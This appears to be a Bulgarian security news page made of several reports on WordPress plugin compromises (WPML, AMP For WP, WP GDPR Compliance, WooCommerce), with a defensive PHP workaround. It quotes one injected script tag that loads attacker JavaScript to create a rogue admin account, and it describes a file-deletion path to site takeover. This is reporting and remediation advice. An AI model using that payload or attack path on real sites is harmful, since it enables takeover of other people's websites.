wordpress

Един от най-популярните WordPress плъгини за мултиезичност WPML е бил компрометиран от бивш служител. Това става ясно от имейл, разпратен до потребителите на компанията (които са над 600,000 души, според официалния ѝ сайт). В официалното съобщение се казва, че бившият служител е оставил backdoor, преди да напусне компанията. С него той е успял да:

• Копира имена и мейли на клиенти на WPML
• Разпратил е мейли до тях
• Спрял е страницата за поръчка на WPML и е публикувал фалшив блог пост от името на компанията

Прочетете и: Четири начина служителите да се превърнат в заплаха за бизнеса ви

Разпратеното фалшиво съобщение е от мним потребител, който твърди, че WPML има „смешни уязвимости в сигурността си, които въпреки всички ъпдейти, позволи два от най-важните ми сайта да бъдат хакнати“, както и че „WPML позволи достъпа до лична информация за хора, които имат минимални способности да програмират.“

Скрийншот от мейла може да видите по-долу:

FYI: someone hacked @wpml‘s website and sent this out to everyone pic.twitter.com/lMml23qUjD

— Ben Word (@retlehs) 19 януари 2019 г.

В официалното съобщение на WPML се казва още, че самият плъгин не е компрометиран, а атакуващият не е модифицирал кода му. Не е компрометирана и финансова информация. Има вероятност обаче акаунтите на потребителите да са компрометирани, тъй като атакуващият се е сдобил с имена и имейли – а съветът на компанията към засегнатите е да сменят паролите си.

WPML е плъгин, който позволява на потребителите да създават сайтове на повече от един език на WordPress.

Уязвимост в популярния плъгин AMP For WP се експлоатира активно, съобщава Wordfence. Приставката, която се използва от поне 100 хил. уебмастъри, позволява създаване на администраторски акаунти и превземане на сайтове.

AMP For WP се използва от администраторите, за да оптимизират сайтовете си за мобилни устройства. На 17 ноември се появи предупреждение, че в плъгина има уязвимост. Тя позволява на регистриран в сайта потребител да създаде акаунт с администраторски права.

@TenableSecurity RE: https://t.co/4bOEVDebIr
Many exploits were discovered by me when I wanted to fix a bug, not @webarx_security. I just never released how to exploit it, because that’s in vain. See https://t.co/01pfQh6Sui for details, which I submitted after the fix went live.

— Sybre Waaijer (@SybreWaaijer) November 17, 2018

Според Wordfence тази уязвимост вече се експлоатира с XSS атака, при която авторът се опитва да инжектира зловреден код в набелязания сайт. При повечето засечени атаки инжектираният код изглежда така: <script src=https://sslapis[.]com/assets/si/stat.js></script>. 

Ако скриптът бъде зареден от браузъра на администратора, той създава нов потребител supportuuser с администраторски права, който е под контрола на авттора на скрипта.

„Тази малуер кампания показва, че статичните XSS уязвимости все още са заплаха. Ако хакерът може да подкара зловреден код в браузъра на администратора на сайта, той може да използва цял набор от техники, с които да поеме контрола над сайта“, коментират от Wordfence.

Преди по-малко от две седмици Wordfence съобщи за уязвимост в друг плъгин, която също позволява превземане на сайтове.

Популярният плъгин WP GDPR Compliance съдържа уязвимост, с която неоторизиран потребител може да получи администраторски права върху сайта. Уязвимостта засяга над 100 хил. базирани на WordPress сайта, които в момента използват плъгина.

Според Wordfence уязвимостта може да се експлоатира изключително лесно. Достатъчно е злонамерено лице да въведе няколко реда код в онлайн формата на WP GDPR Compliance. С нея потребителите на сайта искат копие от данните си. Изпълнението на кода води до това, че в системата на WordPress може да се създаде нов потребител с администраторски привилегии. Така злонамереното лице може да поеме контрола над сайта.

„Над 100 хил. сайта, работещи с WordPress и използващи WP GDPR Compliance, са били уязвими на тази атака. Критично важно е всички сайтове, които използват този плъгин, да го обновят възможно най-бързо“, коментират от Wordfence.

WP GDPR Compliance е много популярен в България и Европа, тъй като дава възможност на фирмите лесно да приведат сайтовете си в съответствие с GDPR. Уязвимостта съществува във версиите на WP GDPR Compliance до 1.4.2.

В помощните форуми на WordPress са публикувани сигнали от потребители. Те твърдят, че някой инсталира плъгини на сайтовете им. Сигналите датират от средата на октомври, В последствие е установено, че всички хакнати сайтове използват WP GDPR Compliance и именно той е вратичката, през която е получен достъп.

Съвети за бизнеса

Ако вашият сайт  използва този плъгин, влезте в администраторския панел на WordPress и обновете до версия 1.4.3, в която уязвимостта е остранена. Алтернативата е да изключите плъгина.

Уязвимост в един от най-популярните WordPress плъгини за електронна търговия позволява да се поеме контрол върху целия сайт. Откриетието е на Саймън Сканъл от RIPS Tech, която разработва софтуер за анализ на PHP код.

Уязвимостта засяга WooCommerce – популярна в България и по света платформа за онлайн търговия. В момента този плъгин се използва от над 4 млн. активни потребители.

Какъв е проблемът

WordPress използва система с различни рангове потребители: Administrator, Editor, Author и т.н. При инсталирането на WooCommerce в системата се създава потребител с ранг Shop Manager. Той има права да променя привилегиите на останалите категории потребители; дори на администратора на сайта.

Това, разбира се, е опасно. За да предотврати злоупотреби, WooCommerce съдържа ограничителна функция, която забранява на Shop Manager да модифицира администраторския профил.

Проблемът е, че ако плъгинът бъде спрян или изтрит, тази функция престава да действа. Така в системата на WordPress изведнъж се появява потребител, който има права дa модифицира акаунта на администратора.

Самият Shop Manager няма възможност да спре WooCommerce. За сметка на това той има достъп до функцията на WooCommerce за изтриване на логове.

Достъп до целия сайт

Именно тук Сканъл открива уязвимост. Оказва се, че тази функция позволява на Shop Manager да изтрие woocommerce.php – основният файл, който захранва плъгина. Ако той бъде изтрит, WooCommerce спира да работи и Shop Manager може да редактира профила на администратора и да определя какви права има.

За да се осъществи успешна атака, нейният автор първо трябва да има достъп до WooCommerce акаунта. Това може да стане чрез фишинг или вътрешен човек от компанията, която притежава сайта. След като разполага с потребителско име и парола за WooCommerce, той може да превземе целия сайт през плъгина.

“Ограничението” при тази уязвимост е, че за да бъде възможно експлоатирането, преди това трябва да се сдобиете с права за четене и запис на медийни файлове. Тоест, за да може злонамерен потребител да се възползва от уязвимостта, той трябва да има права върху системата на минимално ниво “Автор”.

Какви са последствията?

Веднъж сдобил се с необходимите права, злонамерен потребител, който е запознат с уязвимостта може да изтрие всеки файл от инсталацията на WordPress. Под заплаха са и файловете на сървъра, върху който процеса PHP има разрешение за изтриване. Атакуващият може също така да изтрие цяла WordPress инсталация и да заобиколи мерките за сигурност, за да изпълни произволен код на сървъра.

Сред един от файловете, които могат да бъдат изтрити е сърварният конфигурационен файл – .htaccess (който може да съдържа ограничения, свързани със сигурността). Друг важен компонент, с който може да се сдобие атакуващият е съдържанието на wp-config.php (който съдържа идентификационните данни за базата данни). И двата файла са изключително важни за сигурността на инсталацията и достъпа до тях би довел до пълно компрометиране на системата.

Друг подход, които атакуващият може да предприеме е да изтрие wp-config.php и така да задейства процеса на инсталиране на WordPress при следващото посещение на уебсайта. Това от своя страна ще му позволи да премине през процеса на инсталиране и да създаде администраторски акаунти по свой избор, след което да премине към следващата стъпка по изпълнение на произволен код върху машината.

Има ли фикс и как можем сами да си помогнем

Въпреки че в началото на годината от екипа, отговарящ за сигурността на WP беше получено уверение, че проблемът ще бъде отстранен в следващите шест месеца. Проблемът все още е на лице и няма яснота кога ще бъде пусната кръпка.

Тъй като атаката изисква потребителски акаунт, с уязвимостта не може да бъде злоупотребено масово, с цел компрометиране на произволни WordPress сайтове. Въпреки всичко, ето какви мерки можем да предприемем ако все пак се налага върху системата да работи повече от един потребител с минимум авторска роля.

Като за начало се уверете, че процесът на PHP разполага само с толкова права, колкото са необходими за безпроблемната работа на сайта. Тоест – прилагайте златното правило за “least privileges”, когато това е възможно

Също така, като временно решение можете да добавите следния код във файла functions.php, върху темата, която използвате.

add_filter( 'wp_update_attachment_metadata', 'rips_unlink_tempfix' );

function rips_unlink_tempfix( $data ) {

if( isset($data['thumb']) ) {

$data['thumb'] = basename($data['thumb']);

}

return $data;

}

Това, което прави посочения код е да се “закачи” за функцията ‘wp_update_attachment_metadata’ и да се увери, че данните в променливата ‘thumb’ нямат непозволени стойности, които биха позволили експлоатация през path traversal.

И не на последно място, винаги използвайте защитна стена с възможност за WAF (Web Application Firewall). Конфигуриран “правилно”, този инструмент може да ви спести доста главоболия.

Бъдете винаги в крак с новините от света на информационната сигурност – станете наши фенове във Facebook.